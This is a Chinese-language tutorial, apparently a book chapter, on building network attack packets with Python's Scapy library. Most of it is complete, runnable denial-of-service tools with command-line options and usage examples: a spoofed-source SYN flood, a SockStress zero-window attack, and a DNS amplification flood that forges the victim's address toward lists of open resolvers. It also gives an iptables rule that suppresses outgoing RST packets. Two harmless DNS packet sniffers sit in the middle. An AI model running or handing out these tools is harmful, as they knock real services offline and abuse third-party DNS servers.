Python 使用Scapy构造攻击包

Scapy是一款Python库,可用于构建、发送、接收和解析网络数据包。除了实现端口扫描外,它还可以用于实现各种网络安全工具,例如SynFlood攻击,Sockstress攻击,DNS查询攻击,ARP攻击,ARP中间人等。这些工具都是基于构造、发送和解析网络数据包来实现的,可以用于模拟各种网络攻击,测试网络安全防御措施等。Scapy是网络安全领域中非常有用的工具之一。

21.4.1 SynFlood

Syn-Flood(Syn洪水攻击)是一种常见的DoS拒绝服务攻击方式,也被称为TCP Syn-Flood攻击。攻击者利用TCP连接建立过程中的漏洞,向目标主机发送大量的TCP连接请求(SYN),目标主机在收到这些请求后会回复一个SYN/ACK确认请求,但是攻击者并不回复ACK确认,使得目标主机在等待ACK确认的过程中,消耗大量的系统资源和带宽,从而导致目标主机无法正常处理合法的连接请求,使得正常用户无法访问该服务。

默认情况下每一种系统的并发连接都是有限制的,如果恶意攻击持续进行,将会耗尽系统有限的连接池资源。在Windows系统下这个半开连接数是10个,具体来说攻击者可以通过伪造地址对服务器发起SYN请求,服务器就会回应SYN+ACK此时攻击者的主机如果拒绝发送RST+ACK标志,那么服务器接收不到RST请求,就会认为客户端还没有准备好,会重试3-5次并且等待一个SYN Time超时(一般30秒-2分钟)后,丢弃这个连接,虽然有丢包的功能,但是如果攻击者的攻击速度大于目标主机的丢包速度,那么TCP连接池将被填满,此时正常用户将会无法连接到程序中而导致拒绝服务。

由于在发送SYN报文后我们不希望接收到目标主机回复给我们的RST标志,所以需要执行如下这条防火墙命令,将发送到被害IP的RST包丢弃,这样就可以构造出一个非完全TCP链接,也正是我们想要的效果。

iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 被害主机IP地址 -j DROP

接着就是完整的攻击代码,这段代码需要在Linux系统下运行,在运行之前需要指定iface网卡接口,当指定后即可调用攻击代码代码片段实现发包。

#coding=utf-8
import argparse
import socket,sys,random,threading
from scapy.all import *

scapy.config.conf.iface = 'ens32'

# 攻击目标主机TCP/IP半开放连接数
def synflood(target,dstport):
# 加锁
semaphore.acquire()
issrc = '%i.%i.%i.%i' % (random.randint(1,254),random.randint(1,254),random.randint(1,254), random.randint(1,254))
isport = random.randint(1,65535)
ip = IP(src = issrc,dst = target)
syn = TCP(sport = isport, dport = dstport, flags = 'S')
send(ip / syn, verbose = 0)
print("[+] sendp --> {} {}".format(target,isport))
# 释放锁
semaphore.release()

if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-H","--host",dest="host",type=str,help="输入被攻击主机IP地址")
parser.add_argument("-p","--port",dest="port",type=int,help="输入被攻击主机端口")
parser.add_argument("--type",dest="types",type=str,help="指定攻击的载荷 (synflood)")
parser.add_argument("-t","--thread",dest="thread",type=int,help="指定攻击并发线程数")
args = parser.parse_args()
# 使用方式: main.py --type=synflood -H 192.168.1.1 -p 80 -t 10
if args.types == "synflood" and args.host and args.port and args.thread:
semaphore = threading.Semaphore(args.thread)
while True:
t = threading.Thread(target=synflood,args=(args.host,args.port))
t.start()
else:
parser.print_help()

读者可自行运行上述代码,通过传入--type=synflood -H 192.168.1.1 -p 80 -t 10参数,其含义是对192.168.1.1主机的80端口执行洪水攻击,并启用10个线程执行,输出效果图如下所示;

21.4.2 SockStress

SockStress 全连接攻击属于TCP全连接攻击,其攻击的原理与SYN Flood攻击类似,但是它使用完整的TCP三次握手,这使得它更难以检测和防御。该攻击的关键点就在于,攻击主机将windows窗口缓冲设置为0实现拒绝服务。攻击者向目标发送一个很小的流量,但是会造成产生的攻击流量是一个巨大的,该攻击消耗的是目标系统的CPU/内存资源,使用低配版的电脑,依然可以让庞大的服务器拒绝服务,也称之为放大攻击。

该攻击方式通过与目标主机建立大量的socket连接,并且都是完整连接,最后的ACK包,将Window窗口大小设置为0,客户端不接收数据,而服务器此时会认为客户端缓冲区还没有准备好,从而一直等待下去(持续等待将使目标机器内存一直被占用),由于是异步攻击,所以单机模式也可以拒绝高配的服务器。

#coding=utf-8
import argparse
import socket,sys,random,threading
from scapy.all import *

scapy.config.conf.iface = 'ens32'

# 攻击目标主机的Window窗口
def sockstress(target,dstport):
# 加锁
semaphore.acquire()
isport = random.randint(0,65535)
response = sr1(IP(dst=target)/TCP(sport=isport,dport=dstport,flags="S"),timeout=1,verbose=0)
send(IP(dst=target)/ TCP(dport=dstport,sport=isport,window=0,flags="A",ack=(response[TCP].seq +1))/'\x00\x00',verbose=0)
print("[+] sendp --> {} {}".format(target,isport))
# 释放锁
semaphore.release()

if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-H","--host",dest="host",type=str,help="输入被攻击主机IP地址")
parser.add_argument("-p","--port",dest="port",type=int,help="输入被攻击主机端口")
parser.add_argument("--type",dest="types",type=str,help="指定攻击的载荷 (sockstress)")
parser.add_argument("-t","--thread",dest="thread",type=int,help="指定攻击并发线程数")
args = parser.parse_args()
# 使用方式: main.py --type=sockstress -H 192.168.1.1 -p 80 -t 10
if args.types == "sockstress" and args.host and args.port and args.thread:
semaphore = threading.Semaphore(args.thread)
while True:
t = threading.Thread(target=sockstress,args=(args.host,args.port))
t.start()
else:
parser.print_help()

这段代码的使用方法与SynFlood攻击保持一致,通过指定--type=sockstress -H 192.168.1.1 -p 80 -t 100即可实现对特定主机特定端口的拒绝服务,输出效果如下图所示;

21.4.3 DNSSelect

DNS查询放大攻击是一种利用域名系统(DNS)服务器的缺陷来放大攻击流量的网络攻击。攻击者通过向具有恶意域名的DNS服务器发送DNS查询请求,该服务器会向被攻击者发送响应,但是响应内容比请求更大。攻击者可以利用这种响应的放大效应,将大量流量发送到被攻击者的系统上,从而导致系统资源的耗尽和服务不可用。

该攻击可以通过欺骗和利用DNS协议的特性进行,通常利用UDP端口53来执行。攻击者会伪造一个源IP地址,向DNS服务器发送一个查询请求,请求的数据包比较小,但是响应的数据包比请求的数据包大很多,这就导致了放大的效果。

DNS是域名系统(Domain Name System)的缩写,是一个用于将域名转换为IP地址的分布式数据库系统。在进行DNS查询时,客户端会向DNS服务器发送DNS查询请求(DNS Query,DNSQR)包,DNS服务器则会回应DNS响应(DNS Response,DNSRR)包。

一个DNSQR包含以下重要的字段:

  • 问题域名(QNAME):需要进行查询的域名
  • 查询类型(QTYPE):查询的类型,例如A记录、AAAA记录、CNAME记录等
  • 查询类(QCLASS):查询的类别,通常为Internet(IN)

一个DNSRR包含以下重要的字段:

  • 资源记录名称(RR NAME):资源记录的名称
  • 资源记录类型(TYPE):资源记录的类型,例如A记录、AAAA记录、CNAME记录等
  • 资源记录类(CLASS):资源记录的类别,通常为Internet(IN)
  • 生存时间(TTL):资源记录在DNS缓存中的生存时间
  • 数据长度(RDLENGTH):资源记录的数据长度
  • 资源记录数据(RDATA):资源记录的数据,例如IPv4地址、IPv6地址、域名等

我们首先使用Scapy库解析DNSRR数据包,DNSRR是DNS协议中的一种资源记录(Resource Record),用于表示DNS服务器返回的回答记录。其格式包括了Name(域名)、Type(资源记录类型)、Class(资源记录类别)、TTL(生存时间)、RDLENGTH(数据长度)、RDATA(数据)。

DNS响应中,通常会有多个DNSRR记录,每个记录包含一个域名对应的IP地址或其他资源信息。例如,一个A记录的DNSRR会包含一个域名和一个IPv4地址。而MX记录的DNSRR则会包含一个域名和一个邮件服务器的优先级和地址,如下代码实现了分别提取出含有查询的域名和对应的IPrrnamerdata变量,并将这些数据输出到屏幕。

#coding=utf-8
from scapy.all import *
from IPy import IP as PYIP

# 检查数据包的IP层,提取出IP和TTL字段的值
def Get_TTL(pkt):
try:
if pkt.haslayer(IP):
ip_src = pkt.getlayer(IP).src
ip_sport = pkt.getlayer(IP).sport
ip_dst = pkt.getlayer(IP).dst
ip_dport = pkt.getlayer(IP).dport
ip_ttl = str(pkt.ttl)
print("[+] 源地址: %15s:%-5s --> 目标地址: %15s:%-5s --> TTL: %-5s"%(ip_src,ip_sport,ip_dst,ip_dport,ip_ttl))
except Exception:
pass

# 获取本机发送出去的DNS请求所对应的网站地址
def GetDNSRR(pkt):
if pkt.haslayer(DNSRR):
rrname = pkt.getlayer(DNSRR).rrname
rdata = pkt.getlayer(DNSRR).rdata
ttl = pkt.getlayer(DNSRR).ttl
print("[+] 域名: {} --> 别名: {} --> TTL: {}".format(rrname,rdata,ttl))

if __name__=="__main__":
sniff(prn=GetDNSRR,store=0)

读者可自行运行上述代码,此时当有DNS查询时,则会自动解析出对应的别名以及该主机的TTL值,如下图所示;

接着我们来解析一下DNSQR,DNSQR是DNS查询请求的部分,用于DNS协议的域名解析。DNSQR包含以下字段:

  • qname:表示查询的域名,例如www.lyshark.com
  • qtype:表示查询类型,通常为A记录、CNAME记录、MX记录等
  • qclass:表示查询类别,通常为IN(Internet)

DNSQR记录通常包含在DNS消息中的请求部分中,请求部分也可以包含多个DNSQR记录,每个记录对应一个查询,解析此类数据同样很容易实现,具体代码如下所示;

#coding=utf-8
from scapy.all import *
from IPy import IP as PYIP

# 获取本机发送出去的网址请求解析为IP URL --> IP
def GetDNSQR(pkt):
# 判断是否含有DNSRR且存在UDP端口53
if pkt.haslayer(DNSRR) and pkt.getlayer(UDP).sport == 53:
rcode = pkt.getlayer(DNS).rcode
qname = pkt.getlayer(DNSQR).qname
# 若rcode为3,则表示该域名不存在
if rcode == 3:
print("[-] 域名解析不存在")
else:
print("[+] 解析存在:" + str(qname))

if __name__=="__main__":
sniff(prn=GetDNSQR,store=0)

读者可运行上述代码,此时即可输出当前系统内访问过的链接,输出效果如下图所示;

接着我们就来实现查询放大攻击,查询放大攻击的原理是,通过网络中存在的DNS服务器资源,对目标主机发起拒绝服务攻击,通过伪造源地址为被攻击目标的地址,向DNS递归服务器发起查询请求,此时由于源IP是伪造的,固在DNS服务器回包的时候,会默认回给伪造的IP地址,从而使DNS服务成为了流量放大和攻击的实施者,通过查询大量的DNS服务器,从而实现反弹大量的查询流量,导致目标主机查询带宽被塞满,实现DDOS的目的。

查询放大攻击的实施依赖于海量的DNS服务器资源,所以在执行攻击时需要自行寻找这些服务器资源,当找到后则可存储到文件内,当需要使用时首先调用Inspect_DNS_Usability函数依次验证DNS服务器的可用性,并将可用的地址保存为pass.log文件,当需要发起攻击时可通过DNS_Flood调用并传入合法的DNS服务器地址实现DNS查询。

import os,sys,threading,time
from scapy.all import *
import argparse

def Inspect_DNS_Usability(filename):
proxy_list = []
fp = open(filename,"r")
for i in fp.readlines():
try:
addr = i.replace("\n","")
respon = sr1(IP(dst=addr)/UDP()/DNS(rd=1,qd=DNSQR(qname="www.baidu.com")),timeout=2)
if respon != "":
proxy_list.append(str(respon["IP"].src))
except Exception:
pass
return proxy_list

def DNS_Flood(target,dns):
# 构造IP数据包
ip_pack = IP()
ip_pack.src = target
ip_pack.dst = dns
# ip_pack.src = "192.168.1.2"
# ip_pack.dst = "8.8.8.8"
# 构造UDP数据包
udp_pack = UDP()
udp_pack.sport = 53
udp_pack.dport = 53
# 构造DNS数据包
dns_pack = DNS()
dns_pack.rd = 1
dns_pack.qdcount = 1
# 构造DNSQR解析
dnsqr_pack = DNSQR()
dnsqr_pack.qname = "baidu.com"
dnsqr_pack.qtype = 255
dns_pack.qd = dnsqr_pack
respon = (ip_pack/udp_pack/dns_pack)
sr1(respon)

if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--mode",dest="mode",help="选择执行命令<check=检查DNS可用性/flood=攻击>")
parser.add_argument("-f","--file",dest="file",help="指定一个DNS字典,里面存储DNSIP地址")
parser.add_argument("-t",dest="target",help="输入需要攻击的IP地址")
args = parser.parse_args()
# 使用方式: main.py --mode=check -f xxx.log
if args.mode == "check" and args.file:
proxy = Inspect_DNS_Usability(args.file)
fp = open("pass.log","w+")
for item in proxy:
fp.write(item + "\n")
fp.close()
print("[+] DNS地址检查完毕,当前可用DNS保存为 pass.log")
# 使用方式: main.py --mode=flood -f xxx.log -t 192.168.1.1
elif args.mode == "flood" and args.target and args.file:
with open(args.file,"r") as fp:
countent = [line.rstrip("\n") for line in fp]
while True:
randomDNS = str(random.sample(countent,1)[0])
print("[+] 目标主机: {} -----> 随机DNS: {}".format(args.target,randomDNS))
t = threading.Thread(target=DNS_Flood,args=(args.target,randomDNS,))
t.start()
else:
parser.print_help()

读者可保存这段代码,并自行准备一些DNS服务器地址,放入到dns.log目录下,通过执行如下所示的命令即可依次验证服务器地址可用性,如果可用则自动保存到pass.log文件内,输出效果如下所示;

当需要对特定主机发起攻击时,可执行如下命令,其中-t带指的则是需要攻击的IP地址,输出效果图如下所示;